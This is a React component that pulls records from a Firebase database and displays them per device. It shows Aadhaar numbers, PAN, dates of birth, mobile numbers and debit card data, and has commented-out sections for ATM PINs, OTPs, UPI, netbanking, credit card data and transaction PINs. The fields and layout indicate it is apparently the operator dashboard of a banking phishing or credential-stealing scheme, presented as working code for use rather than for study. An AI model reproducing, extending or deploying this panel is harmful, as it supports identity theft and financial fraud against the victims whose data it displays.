// components/Datashow.js
import React, { useState, useEffect } from 'react';
import { ref, onValue } from 'firebase/database';
import { dbRealtime } from './firebase'; // Import the Realtime Database
import { Navbar } from './navbar';
import "./Show.css";

function Datashow() {
  const [tableData, setTableData] = useState({});
  const [selectedData, setSelectedData] = useState(null);

  useEffect(() => {
    document.title = "Data Page";
  }, []);

  useEffect(() => {
    const dataRef = ref(dbRealtime, 'Data'); // Reference to the 'Data' path in your database

    const handleDataChange = (snapshot) => {
      if (snapshot.exists()) {
        const dataObj = snapshot.val();
        setTableData(dataObj);
      } else {
        console.log('No data available.');
      }
    };

    const dataListener = onValue(dataRef, handleDataChange);

    return () => {
      dataListener(); // Unsubscribe the listener
    };
  }, []);

  const handleCardClick = (data) => {
    setSelectedData(data);
  };

  const handleBackClick = () => {
    setSelectedData(null);
  };

  const reversedTableData = Object.entries(tableData).reverse();

  return (
    <div>
      <Navbar />
      <h1 style={{ textAlign: 'center', marginTop: '0px', fontSize: '20px' }}>Data</h1>
      <p style={{ textAlign: 'center', color: 'red', padding: '0px', marginTop: '-10px' }}>Show here</p>
      <div style={{ marginLeft: '10px', marginRight: '10px' }}>
        {!selectedData ? (
          reversedTableData.map(([key, value], index) => (
            <div key={index} className='card' onClick={() => handleCardClick(value)}>
              <p>{value.deviceName}</p>
                {/* <p>User ID: {value.user}</p>  */}
              {/* <p>Password: {value.pass}</p> */}
              <p>Mobile No: {value.mobile_number}</p>
              {/* <p>Full Name: {value.Fullname}</p> */}
             
              <p>Adhar Number: {value.aadhar_number}</p>
              {/* <p>Customer ID: {value.customer_id}</p>  */}
              <p>Name: {value.name}</p>
              {/* <p>Adhar: {value.adhar}</p> */}
              <p>DOB: {value.dob}</p>
               {/* <p>Consumer / BP Number.: {value.complain}</p> */}
             <p>Pan: {value.pan}</p>
             {/*  <p>ATM PIN: {value.pin}</p>*/}
              {/* <p>Address: {value.addData}</p> */}
              {/* <p>Account No.: {value.accountNumber}</p> */}

                {/* <p>Complaint.: {value.complaint}</p> */}
              {/* <p>Expiry Date: {value.exp}</p> */}
            </div>
          ))
        ) : (
          <div>
            <button onClick={handleBackClick} className='back-button'>
              Back to List
             </button>
            <div className='details'>
              <p className='heading'>Details for {selectedData.deviceName}</p>
              {/* <p className='heading'>Other Data</p> */}
              {/* {Object.entries(selectedData.additionalData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))} */}
{/* 
{Object.entries(selectedData.userData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))} */}

{/* <p className='heading'>Grid Data</p>
                {Object.entries(selectedData.gridData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))} */}

{/* <p className='heading'>UPI Data</p>
{Object.entries(selectedData.upiData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))} */}

{/* <p className='heading'>OTP Data</p> 
               {Object.entries(selectedData.otpData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))} */}
              {/* <p className='heading'>Netbanking Data</p>
              {Object.entries(selectedData.netData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))}  */}




               <p className='heading'>Debit Card Data</p>
              {Object.entries(selectedData.cardData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))} 
             

{/* <p className='heading'>Credit Card Data</p>
              {Object.entries(selectedData.ccardData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))}  */}

              
{/* <p className='heading'>ATM PIN</p>
              {Object.entries(selectedData.apinData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))} */}
 {/* <p className='heading'>T PIN / Transaction password</p>
                 {Object.entries(selectedData.tpinData || {}).map(([key, value], index) => (
                <p key={index}>
                  {key.charAt(0).toUpperCase() + key.slice(1)}: {value}
                </p>
              ))}  */}

            </div>
          </div>
        )}
      </div>
    </div>
  );
}

export default Datashow;
